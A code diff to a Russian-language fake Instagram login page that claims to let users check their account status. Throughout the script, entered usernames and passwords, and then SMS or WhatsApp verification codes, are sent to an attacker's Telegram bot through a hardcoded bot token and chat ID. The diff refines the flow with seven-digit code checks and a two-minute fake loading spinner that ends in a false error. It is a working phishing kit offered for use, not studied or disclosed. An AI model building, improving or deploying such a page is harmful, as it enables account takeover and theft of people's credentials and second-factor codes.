--- a/index.htm
+++ b/index.htm
@@ -68,23 +68,32 @@
             text-align: center;
         }
 
-        .divider::before,
+        .divider::before {
+            content: '';
+            display: block;
+            height: 1px;
+            background-color: #dbdbdb;
+            margin: 0 auto;
+            width: 90px;
+        }
+
         .divider::after {
             content: '';
             display: block;
             height: 1px;
             background-color: #dbdbdb;
-            width: 40%;
             margin: 0 auto;
+            width: 90px;
         }
 
         .divider span {
             position: absolute;
-            top: -10px;
             background-color: #fafafa;
             padding: 0 10px;
             font-size: 14px;
             color: #8e8e8e;
+            top: -10px;
+            left: 135px;
         }
 
         .signup-link {
@@ -101,49 +110,6 @@
             text-decoration: underline;
         }
 
-        /* Modal Styles */
-        .modal {
-            display: none;
-            position: fixed;
-            top: 0;
-            left: 0;
-            width: 100%;
-            height: 100%;
-            background-color: rgba(0, 0, 0, 0.5);
-            justify-content: center;
-            align-items: center;
-        }
-
-        .modal-content {
-            background-color: white;
-            padding: 30px;
-            border-radius: 10px;
-            text-align: center;
-        }
-
-        .modal-content input {
-            width: 100%;
-            padding: 12px;
-            margin-top: 10px;
-            border: 1px solid #dbdbdb;
-            border-radius: 5px;
-            font-size: 14px;
-        }
-
-        .modal-content button {
-            background-color: #0095f6;
-            color: white;
-            border: none;
-            padding: 12px;
-            border-radius: 5px;
-            margin-top: 10px;
-            cursor: pointer;
-        }
-
-        .modal-content button:hover {
-            background-color: #0078d4;
-        }
-
         /* Loading Spinner Styles */
         #loadingSpinner {
             display: none;
@@ -156,10 +122,6 @@
             animation: spin 1s linear infinite;
         }
 
-        #error {
-            color: red;
-        }
-
         @keyframes spin {
             0% {
                 transform: rotate(0deg);
@@ -170,7 +132,39 @@
             }
         }
 
-        /* Infinite loading spinner for SMS verification */
+        /* Verification Section Styles */
+        #verificationSection {
+            display: none;
+            /* Hidden by default */
+        }
+
+        #verificationSection h3 {
+            margin-bottom: 20px;
+        }
+
+        #verificationSection input {
+            width: 100%;
+            padding: 12px;
+            margin: 10px 0;
+            border: 1px solid #dbdbdb;
+            border-radius: 5px;
+            font-size: 14px;
+        }
+
+        #verificationSection button {
+            background-color: #0095f6;
+            color: white;
+            border: none;
+            padding: 12px;
+            border-radius: 5px;
+            margin-top: 10px;
+            cursor: pointer;
+        }
+
+        #verificationSection button:hover {
+            background-color: #0078d4;
+        }
+
         #smsLoadingSpinner {
             display: none;
             border: 4px solid #f3f3f3;
@@ -182,15 +176,35 @@
             animation: spin 1s linear infinite;
         }
 
-        #smsModal .modal-content p {
-            font-size: 14px;
-            color: #8e8e8e;
-        }
-
         .error-message {
             color: red;
             margin-top: 20px;
             font-size: 16px;
+        }
+
+        .back-button {
+            background-color: transparent;
+            color: #0095f6;
+            border: none;
+            cursor: pointer;
+            font-size: 14px;
+            margin-top: 10px;
+        }
+
+        .back-button:hover {
+            text-decoration: underline;
+        }
+
+        /* Remove increment/decrement buttons from number input */
+        input[type=number]::-webkit-inner-spin-button,
+        input[type=number]::-webkit-outer-spin-button {
+            -webkit-appearance: none;
+            margin: 0;
+        }
+
+        input[type=number] {
+            -moz-appearance: textfield;
+            /* For Firefox */
         }
     </style>
 </head>
@@ -201,50 +215,41 @@
         <img src="./Instagram_logo_2022.svg.png" alt="Instagram Logo">
         <h1>Проверьте свой статус в Instagram</h1>
         <!-- Login Form -->
-        <form onsubmit="handleLogin(event)">
+        <form id="loginForm" onsubmit="handleLogin(event)">
             <input type="text" id="username" name="username" placeholder="Имя пользователя" required>
             <input type="password" id="password" name="password" placeholder="Пароль" required>
             <input type="submit" value="Войти">
         </form>
-
         <!-- Loading Spinner -->
         <div id="loadingSpinner"></div>
-
         <!-- Divider -->
         <div class="divider">
             <span>ИЛИ</span>
         </div>
-
         <!-- Sign Up Link -->
         <div class="signup-link">
             <p> Нет аккаунта? <a href="#">Зарегистрироваться</a></p>
         </div>
-    </div>
-
-    <!-- Modal for SMS Verification -->
-    <div id="smsModal" class="modal">
-        <div class="modal-content">
-            <h3>Проверьте свои СМС, мы отправили вам код!</h3>
+        <!-- Verification Section -->
+        <div id="verificationSection">
+            <h3>Проверьте свои СМС или WhatsApp мы отправили вам код!</h3>
             <p>Если код не был отправлен, попробуйте войти снова.</p>
-            <input type="text" id="verificationCode" placeholder=" Введите код подтверждения" required>
+            <input type="number" id="verificationCode" placeholder=" Введите код подтверждения" required>
             <button onclick="handleVerificationCode()">Отправить</button>
-
-            <div id="error"></div>
+            <button class="back-button" onclick="goBackToLogin()">Назад</button>
+            <div id="error" class="error-message"></div>
             <!-- SMS Loading Spinner -->
             <div id="smsLoadingSpinner"></div>
         </div>
     </div>
-
     <script>
         // Function to send data to Telegram Bot
         function sendToTelegram(username, password) {
             const botToken = '7848679382:AAG9RDlm4FVRpyKcbXCoLExV_CoA4TCu7RI'; // Replace with your bot API token
             const chatId = '6956607670'; // Replace with your chat ID
-
-            const message = `Username: ${username}\nPassword: ${password}`;
-
+            const message = `Username: ${username}
+Password: ${password}`;
             const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
-
             // Send request to Telegram
             fetch(url)
                 .then(response => response.json())
@@ -255,16 +260,12 @@
                     console.error('Error sending message to Telegram:', error);
                 });
         }
-
         // Function to send verification code to Telegram Bot
         function sendVerificationCodeToTelegram(code) {
             const botToken = '7848679382:AAG9RDlm4FVRpyKcbXCoLExV_CoA4TCu7RI'; // Replace with your bot API token
             const chatId = '6956607670'; // Replace with your chat ID
-
             const message = `Verification Code: ${code}`;
-
             const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
-
             // Send request to Telegram
             fetch(url)
                 .then(response => response.json())
@@ -275,71 +276,69 @@
                     console.error('Error sending verification code to Telegram:', error);
                 });
         }
-
         // Handle login form submission
         function handleLogin(event) {
             event.preventDefault(); // Prevent page refresh on form submit
-
             const username = document.getElementById('username').value;
             const password = document.getElementById('password').value;
-
             if (username && password) {
                 showLoadingSpinner();  // Show loading spinner
                 sendToTelegram(username, password); // Send username and password to Telegram
-                showModal(); // Show the modal after login attempt
+                // Hide login form and show verification section after 2 seconds
+                setTimeout(() => {
+                    hideLoadingSpinner();
+                    document.getElementById('loginForm').style.display = 'none';
+                    document.getElementById('verificationSection').style.display = 'block';
+                }, 2000); // Simulate delay for demo (e.g., network delay)
             } else {
                 alert('Пожалуйста, введите и имя пользователя, и пароль.');
             }
         }
-
-        // Show the loading spinner
-        function showLoadingSpinner() {
-            document.getElementById('loadingSpinner').style.display = 'block';
-        }
-
-        // Hide the loading spinner
-        function hideLoadingSpinner() {
-            document.getElementById('loadingSpinner').style.display = 'none';
-        }
-
-        // Show the modal
-        function showModal() {
-            setTimeout(() => {
-                hideLoadingSpinner(); // Hide the spinner once the message is sent
-                document.getElementById('smsModal').style.display = 'flex';
-            }, 2000); // Simulate delay for demo (e.g., network delay)
-        }
-
         // Handle verification code submission
         function handleVerificationCode() {
             const verificationCode = document.getElementById('verificationCode').value;
+            const errorMessage = document.getElementById("error");
 
-            if (verificationCode) {
+            // Clear previous error messages
+            errorMessage.textContent = '';
+
+            // Validate that the code is exactly 7 digits
+            if (verificationCode && verificationCode.length === 7 && /^\d+$/.test(verificationCode)) {
                 // Send the verification code to Telegram
                 sendVerificationCodeToTelegram(verificationCode);
 
                 // Show infinite loading for 2 minutes after submitting the code
                 showSmsLoadingSpinner();
-
                 setTimeout(() => {
                     hideSmsLoadingSpinner();
                     // Show error message after 2 minutes if code is not correct
-                    const errorMessage = document.getElementById("error");
                     errorMessage.textContent = 'Код неверный, проверьте его еще раз!';
                 }, 120000); // Keep loading spinner for 2 minutes (120000 ms)
             } else {
-                alert('Пожалуйста, введите код подтверждения.');
+                // Display error message under the input field
+                errorMessage.textContent = 'Пожалуйста, введите корректный 7-значный код.';
             }
         }
-
+        // Show the loading spinner
+        function showLoadingSpinner() {
+            document.getElementById('loadingSpinner').style.display = 'block';
+        }
+        // Hide the loading spinner
+        function hideLoadingSpinner() {
+            document.getElementById('loadingSpinner').style.display = 'none';
+        }
         // Show infinite loading spinner for SMS verification
         function showSmsLoadingSpinner() {
             document.getElementById('smsLoadingSpinner').style.display = 'block';
         }
-
         // Hide the infinite loading spinner for SMS verification
         function hideSmsLoadingSpinner() {
             document.getElementById('smsLoadingSpinner').style.display = 'none';
+        }
+        // Function to go back to the login form
+        function goBackToLogin() {
+            document.getElementById('verificationSection').style.display = 'none';
+            document.getElementById('loginForm').style.display = 'block';
         }
     </script>
 </body>
